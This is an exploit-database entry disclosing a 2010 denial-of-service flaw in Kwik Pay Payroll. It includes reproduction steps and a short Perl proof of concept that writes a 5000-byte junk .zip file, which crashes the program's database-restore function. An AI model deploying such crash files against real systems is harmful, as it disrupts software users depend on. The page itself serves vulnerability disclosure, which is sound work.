header-logo
Suggest Exploit
vendor:
Kwik Pay Payroll
by:
[anonymous]
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Kwik Pay Payroll
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Kwik Pay Payroll .zip DoS

When a maliciously crafted .zip file is opened in Kwik Pay Payroll, the program crashes and becomes unresponsive.

Mitigation:

Ensure that all .zip files are scanned for malicious content before opening.
Source

Exploit-DB raw data:

# Exploit Title: Kwik Pay Payroll .zip DoS
# Date: April 1, 2010
# Tested on: Windows XP SP3
# Cost: 100.00 AU
# Author: [anonymous]
# Site: [http://www.setfreesecurity.com]
#
# File -> Restore Database -> Find
# Locate zip file
# Click the restore button at the bottom
# Program Crash, and becomes unresponsive
#
# Happy April fools but no Joke here
# 
# Phil 4:13
#
#!/usr/bin/perl


print "Generating nasty Backup\n";

my $data = "\x41" x 5000;
my $zip = "kwikbak.zip";

open (FILE, ">$zip");
print FILE "$data";

print "Done. . .\n"

Navigation

Suggest Exploit

Services By CQR